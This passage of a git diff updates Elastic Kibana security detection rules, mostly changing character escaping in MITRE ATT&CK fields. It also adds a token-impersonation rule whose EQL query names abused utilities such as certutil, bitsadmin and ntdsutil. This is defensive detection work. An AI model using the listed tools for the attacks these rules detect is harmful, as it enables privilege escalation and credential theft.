'%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", - "query": "process where host.os.type == \"windows\" and event.type == \"start\" and length(process.name) \u003e 0 and\n length(process.name) == 5 and length(process.pe.original_file_name) \u003e 5\n", + "note": "## Triage and analysis\n\n### Investigating Renamed Utility Executed with Short Program Name\n\nIdentifies the execution of a process with a single character process name, differing from the original file name. This is often done by adversaries while staging, executing temporary utilities, or trying to bypass security detections based on the process name.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, command line and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and length(process.name) > 0 and\n length(process.name) == 5 and length(process.pe.original_file_name) > 5\n", "related_integrations": [ { "package": "endpoint", @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/184dfe52-2999-42d9-b9d1-d1ca54495a61_103.json b/packages/security_detection_engine/kibana/security_rule/184dfe52-2999-42d9-b9d1-d1ca54495a61_103.json index b4df338e607..fb52b179ec1 100644 --- a/packages/security_detection_engine/kibana/security_rule/184dfe52-2999-42d9-b9d1-d1ca54495a61_103.json +++ b/packages/security_detection_engine/kibana/security_rule/184dfe52-2999-42d9-b9d1-d1ca54495a61_103.json @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0010", "name": "Exfiltration", diff --git a/packages/security_detection_engine/kibana/security_rule/184dfe52-2999-42d9-b9d1-d1ca54495a61_104.json b/packages/security_detection_engine/kibana/security_rule/184dfe52-2999-42d9-b9d1-d1ca54495a61_104.json index 9ffceae3b47..3638325a41f 100644 --- a/packages/security_detection_engine/kibana/security_rule/184dfe52-2999-42d9-b9d1-d1ca54495a61_104.json +++ b/packages/security_detection_engine/kibana/security_rule/184dfe52-2999-42d9-b9d1-d1ca54495a61_104.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0010", "name": "Exfiltration", diff --git a/packages/security_detection_engine/kibana/security_rule/18a5dd9a-e3fa-4996-99b1-ae533b8f27fc_1.json b/packages/security_detection_engine/kibana/security_rule/18a5dd9a-e3fa-4996-99b1-ae533b8f27fc_1.json index 7ad95fc3381..3973f3b546e 100644 --- a/packages/security_detection_engine/kibana/security_rule/18a5dd9a-e3fa-4996-99b1-ae533b8f27fc_1.json +++ b/packages/security_detection_engine/kibana/security_rule/18a5dd9a-e3fa-4996-99b1-ae533b8f27fc_1.json @@ -33,7 +33,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/193549e8-bb9e-466a-a7f9-7e783f5cb5a6_1.json b/packages/security_detection_engine/kibana/security_rule/193549e8-bb9e-466a-a7f9-7e783f5cb5a6_1.json index f7c39723bae..82ad5341163 100644 --- a/packages/security_detection_engine/kibana/security_rule/193549e8-bb9e-466a-a7f9-7e783f5cb5a6_1.json +++ b/packages/security_detection_engine/kibana/security_rule/193549e8-bb9e-466a-a7f9-7e783f5cb5a6_1.json @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/193549e8-bb9e-466a-a7f9-7e783f5cb5a6_2.json b/packages/security_detection_engine/kibana/security_rule/193549e8-bb9e-466a-a7f9-7e783f5cb5a6_2.json index 86932870855..ad23e7bc74f 100644 --- a/packages/security_detection_engine/kibana/security_rule/193549e8-bb9e-466a-a7f9-7e783f5cb5a6_2.json +++ b/packages/security_detection_engine/kibana/security_rule/193549e8-bb9e-466a-a7f9-7e783f5cb5a6_2.json @@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/193549e8-bb9e-466a-a7f9-7e783f5cb5a6_3.json b/packages/security_detection_engine/kibana/security_rule/193549e8-bb9e-466a-a7f9-7e783f5cb5a6_3.json index c436e5d9686..929963057a4 100644 --- a/packages/security_detection_engine/kibana/security_rule/193549e8-bb9e-466a-a7f9-7e783f5cb5a6_3.json +++ b/packages/security_detection_engine/kibana/security_rule/193549e8-bb9e-466a-a7f9-7e783f5cb5a6_3.json @@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/19e9daf3-f5c5-4bc2-a9af-6b1e97098f03_1.json b/packages/security_detection_engine/kibana/security_rule/19e9daf3-f5c5-4bc2-a9af-6b1e97098f03_1.json index bf4439c7ee0..03f922ddb0b 100644 --- a/packages/security_detection_engine/kibana/security_rule/19e9daf3-f5c5-4bc2-a9af-6b1e97098f03_1.json +++ b/packages/security_detection_engine/kibana/security_rule/19e9daf3-f5c5-4bc2-a9af-6b1e97098f03_1.json @@ -33,7 +33,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/1a289854-5b78-49fe-9440-8a8096b1ab50_1.json b/packages/security_detection_engine/kibana/security_rule/1a289854-5b78-49fe-9440-8a8096b1ab50_1.json index 6b18b2f3ccd..ed7a5ffa7d3 100644 --- a/packages/security_detection_engine/kibana/security_rule/1a289854-5b78-49fe-9440-8a8096b1ab50_1.json +++ b/packages/security_detection_engine/kibana/security_rule/1a289854-5b78-49fe-9440-8a8096b1ab50_1.json @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", @@ -74,7 +74,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", @@ -89,7 +89,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0043", "name": "Reconnaissance", diff --git a/packages/security_detection_engine/kibana/security_rule/1a289854-5b78-49fe-9440-8a8096b1ab50_2.json b/packages/security_detection_engine/kibana/security_rule/1a289854-5b78-49fe-9440-8a8096b1ab50_2.json index dd9d65a5712..eb94c67dc7c 100644 --- a/packages/security_detection_engine/kibana/security_rule/1a289854-5b78-49fe-9440-8a8096b1ab50_2.json +++ b/packages/security_detection_engine/kibana/security_rule/1a289854-5b78-49fe-9440-8a8096b1ab50_2.json @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", @@ -73,7 +73,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", @@ -88,7 +88,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0043", "name": "Reconnaissance", diff --git a/packages/security_detection_engine/kibana/security_rule/1a36cace-11a7-43a8-9a10-b497c5a02cd3_101.json b/packages/security_detection_engine/kibana/security_rule/1a36cace-11a7-43a8-9a10-b497c5a02cd3_101.json index d1cc7fedbaf..a12b164a278 100644 --- a/packages/security_detection_engine/kibana/security_rule/1a36cace-11a7-43a8-9a10-b497c5a02cd3_101.json +++ b/packages/security_detection_engine/kibana/security_rule/1a36cace-11a7-43a8-9a10-b497c5a02cd3_101.json @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/1a36cace-11a7-43a8-9a10-b497c5a02cd3_102.json b/packages/security_detection_engine/kibana/security_rule/1a36cace-11a7-43a8-9a10-b497c5a02cd3_102.json index 96547b84821..5968471f6df 100644 --- a/packages/security_detection_engine/kibana/security_rule/1a36cace-11a7-43a8-9a10-b497c5a02cd3_102.json +++ b/packages/security_detection_engine/kibana/security_rule/1a36cace-11a7-43a8-9a10-b497c5a02cd3_102.json @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/1a6075b0-7479-450e-8fe7-b8b8438ac570_104.json b/packages/security_detection_engine/kibana/security_rule/1a6075b0-7479-450e-8fe7-b8b8438ac570_104.json index 71fd1bfceb8..11851d72dd7 100644 --- a/packages/security_detection_engine/kibana/security_rule/1a6075b0-7479-450e-8fe7-b8b8438ac570_104.json +++ b/packages/security_detection_engine/kibana/security_rule/1a6075b0-7479-450e-8fe7-b8b8438ac570_104.json @@ -59,7 +59,7 @@ ], "risk_score": 47, "rule_id": "1a6075b0-7479-450e-8fe7-b8b8438ac570", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/1a6075b0-7479-450e-8fe7-b8b8438ac570_105.json b/packages/security_detection_engine/kibana/security_rule/1a6075b0-7479-450e-8fe7-b8b8438ac570_105.json index dfd56e70a52..ab5334bc350 100644 --- a/packages/security_detection_engine/kibana/security_rule/1a6075b0-7479-450e-8fe7-b8b8438ac570_105.json +++ b/packages/security_detection_engine/kibana/security_rule/1a6075b0-7479-450e-8fe7-b8b8438ac570_105.json @@ -59,7 +59,7 @@ ], "risk_score": 47, "rule_id": "1a6075b0-7479-450e-8fe7-b8b8438ac570", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/1a6075b0-7479-450e-8fe7-b8b8438ac570_106.json b/packages/security_detection_engine/kibana/security_rule/1a6075b0-7479-450e-8fe7-b8b8438ac570_106.json index 57dfe485f5b..fae6dd0d2e4 100644 --- a/packages/security_detection_engine/kibana/security_rule/1a6075b0-7479-450e-8fe7-b8b8438ac570_106.json +++ b/packages/security_detection_engine/kibana/security_rule/1a6075b0-7479-450e-8fe7-b8b8438ac570_106.json @@ -59,7 +59,7 @@ ], "risk_score": 47, "rule_id": "1a6075b0-7479-450e-8fe7-b8b8438ac570", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/1a6075b0-7479-450e-8fe7-b8b8438ac570_107.json b/packages/security_detection_engine/kibana/security_rule/1a6075b0-7479-450e-8fe7-b8b8438ac570_107.json index b96b58ee23b..2ca796685ae 100644 --- a/packages/security_detection_engine/kibana/security_rule/1a6075b0-7479-450e-8fe7-b8b8438ac570_107.json +++ b/packages/security_detection_engine/kibana/security_rule/1a6075b0-7479-450e-8fe7-b8b8438ac570_107.json @@ -58,7 +58,7 @@ ], "risk_score": 47, "rule_id": "1a6075b0-7479-450e-8fe7-b8b8438ac570", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/1aa8fa52-44a7-4dae-b058-f3333b91c8d7_105.json b/packages/security_detection_engine/kibana/security_rule/1aa8fa52-44a7-4dae-b058-f3333b91c8d7_105.json index 36a5ef0c60f..c55a79f2c8f 100644 --- a/packages/security_detection_engine/kibana/security_rule/1aa8fa52-44a7-4dae-b058-f3333b91c8d7_105.json +++ b/packages/security_detection_engine/kibana/security_rule/1aa8fa52-44a7-4dae-b058-f3333b91c8d7_105.json @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/1aa8fa52-44a7-4dae-b058-f3333b91c8d7_106.json b/packages/security_detection_engine/kibana/security_rule/1aa8fa52-44a7-4dae-b058-f3333b91c8d7_106.json index d8e8e361100..3fefa7ed9b6 100644 --- a/packages/security_detection_engine/kibana/security_rule/1aa8fa52-44a7-4dae-b058-f3333b91c8d7_106.json +++ b/packages/security_detection_engine/kibana/security_rule/1aa8fa52-44a7-4dae-b058-f3333b91c8d7_106.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/1aa8fa52-44a7-4dae-b058-f3333b91c8d7_107.json b/packages/security_detection_engine/kibana/security_rule/1aa8fa52-44a7-4dae-b058-f3333b91c8d7_107.json index 31e20705ca4..6afe208c610 100644 --- a/packages/security_detection_engine/kibana/security_rule/1aa8fa52-44a7-4dae-b058-f3333b91c8d7_107.json +++ b/packages/security_detection_engine/kibana/security_rule/1aa8fa52-44a7-4dae-b058-f3333b91c8d7_107.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/1aa8fa52-44a7-4dae-b058-f3333b91c8d7_208.json b/packages/security_detection_engine/kibana/security_rule/1aa8fa52-44a7-4dae-b058-f3333b91c8d7_208.json index d83d4288da1..bba1240462f 100644 --- a/packages/security_detection_engine/kibana/security_rule/1aa8fa52-44a7-4dae-b058-f3333b91c8d7_208.json +++ b/packages/security_detection_engine/kibana/security_rule/1aa8fa52-44a7-4dae-b058-f3333b91c8d7_208.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/1aa9181a-492b-4c01-8b16-fa0735786b2b_104.json b/packages/security_detection_engine/kibana/security_rule/1aa9181a-492b-4c01-8b16-fa0735786b2b_104.json index e02bccdd51f..0243e7853a8 100644 --- a/packages/security_detection_engine/kibana/security_rule/1aa9181a-492b-4c01-8b16-fa0735786b2b_104.json +++ b/packages/security_detection_engine/kibana/security_rule/1aa9181a-492b-4c01-8b16-fa0735786b2b_104.json @@ -55,7 +55,7 @@ ], "risk_score": 21, "rule_id": "1aa9181a-492b-4c01-8b16-fa0735786b2b", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/1aa9181a-492b-4c01-8b16-fa0735786b2b_105.json b/packages/security_detection_engine/kibana/security_rule/1aa9181a-492b-4c01-8b16-fa0735786b2b_105.json index f5b2ab23204..d2babbc0407 100644 --- a/packages/security_detection_engine/kibana/security_rule/1aa9181a-492b-4c01-8b16-fa0735786b2b_105.json +++ b/packages/security_detection_engine/kibana/security_rule/1aa9181a-492b-4c01-8b16-fa0735786b2b_105.json @@ -55,7 +55,7 @@ ], "risk_score": 21, "rule_id": "1aa9181a-492b-4c01-8b16-fa0735786b2b", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/1aa9181a-492b-4c01-8b16-fa0735786b2b_106.json b/packages/security_detection_engine/kibana/security_rule/1aa9181a-492b-4c01-8b16-fa0735786b2b_106.json index fafefa1a848..b31b7c6467e 100644 --- a/packages/security_detection_engine/kibana/security_rule/1aa9181a-492b-4c01-8b16-fa0735786b2b_106.json +++ b/packages/security_detection_engine/kibana/security_rule/1aa9181a-492b-4c01-8b16-fa0735786b2b_106.json @@ -55,7 +55,7 @@ ], "risk_score": 21, "rule_id": "1aa9181a-492b-4c01-8b16-fa0735786b2b", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/1aa9181a-492b-4c01-8b16-fa0735786b2b_107.json b/packages/security_detection_engine/kibana/security_rule/1aa9181a-492b-4c01-8b16-fa0735786b2b_107.json index c8d979642ff..ad59d46a7f1 100644 --- a/packages/security_detection_engine/kibana/security_rule/1aa9181a-492b-4c01-8b16-fa0735786b2b_107.json +++ b/packages/security_detection_engine/kibana/security_rule/1aa9181a-492b-4c01-8b16-fa0735786b2b_107.json @@ -55,7 +55,7 @@ ], "risk_score": 21, "rule_id": "1aa9181a-492b-4c01-8b16-fa0735786b2b", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "low", "tags": [ "Domain: Endpoint", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/1b0b4818-5655-409b-9c73-341cac4bb73f_1.json b/packages/security_detection_engine/kibana/security_rule/1b0b4818-5655-409b-9c73-341cac4bb73f_1.json new file mode 100644 index 00000000000..2e957492047 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/1b0b4818-5655-409b-9c73-341cac4bb73f_1.json @@ -0,0 +1,131 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the creation of a process impersonating the token of another user logon session. Adversaries may create a new process with a different token to escalate privileges and bypass access controls.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Process Created with a Duplicated Token", + "query": "/* This rule is only compatible with Elastic Endpoint 8.4+ */\n\nprocess where host.os.type == \"windows\" and event.action == \"start\" and\n\n user.id : (\"S-1-5-21-*\", \"S-1-12-1-*\") and\n\n (process.Ext.effective_parent.executable regex~ \"\"\"[C-Z]:\\\\Windows\\\\(System32|SysWOW64)\\\\[a-zA-Z0-9\\-\\_\\.]+\\.exe\"\"\" or\n process.Ext.effective_parent.executable : \"?:\\\\Windows\\\\explorer.exe\") and\n\n (\n process.name : (\"powershell.exe\", \"cmd.exe\", \"rundll32.exe\", \"notepad.exe\", \"net.exe\", \"ntdsutil.exe\",\n \"tasklist.exe\", \"reg.exe\", \"certutil.exe\", \"bitsadmin.exe\", \"msbuild.exe\", \"esentutl.exe\") or\n\n ((process.Ext.relative_file_creation_time <= 900 or process.Ext.relative_file_name_modify_time <= 900) and\n not process.code_signature.status : (\"trusted\", \"errorExpired\", \"errorCode_endpoint*\") and\n not process.executable : (\"?:\\\\Program Files\\\\*\", \"?:\\\\Program Files (x86)\\\\*\"))\n ) and\n not (process.name : \"rundll32.exe\" and\n process.command_line : (\"*davclnt.dll,DavSetCookie*\", \"*?:\\\\Program Files*\",\n \"*\\\\Windows\\\\System32\\\\winethc.dll*\", \"*\\\\Windows\\\\SYSTEM32\\\\EDGEHTML.dll*\",\n \"*shell32.dll,SHCreateLocalServerRunDll*\")) and\n not startswith~(process.Ext.effective_parent.name, process.parent.name)\n", + "references": [ + "https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-createprocesswithtokenw" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "process.Ext.effective_parent.executable", + "type": "unknown" + }, + { + "ecs": false, + "name": "process.Ext.effective_parent.name", + "type": "unknown" + }, + { + "ecs": false, + "name": "process.Ext.relative_file_creation_time", + "type": "unknown" + }, + { + "ecs": false, + "name": "process.Ext.relative_file_name_modify_time", + "type": "unknown" + }, + { + "ecs": true, + "name": "process.code_signature.status", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 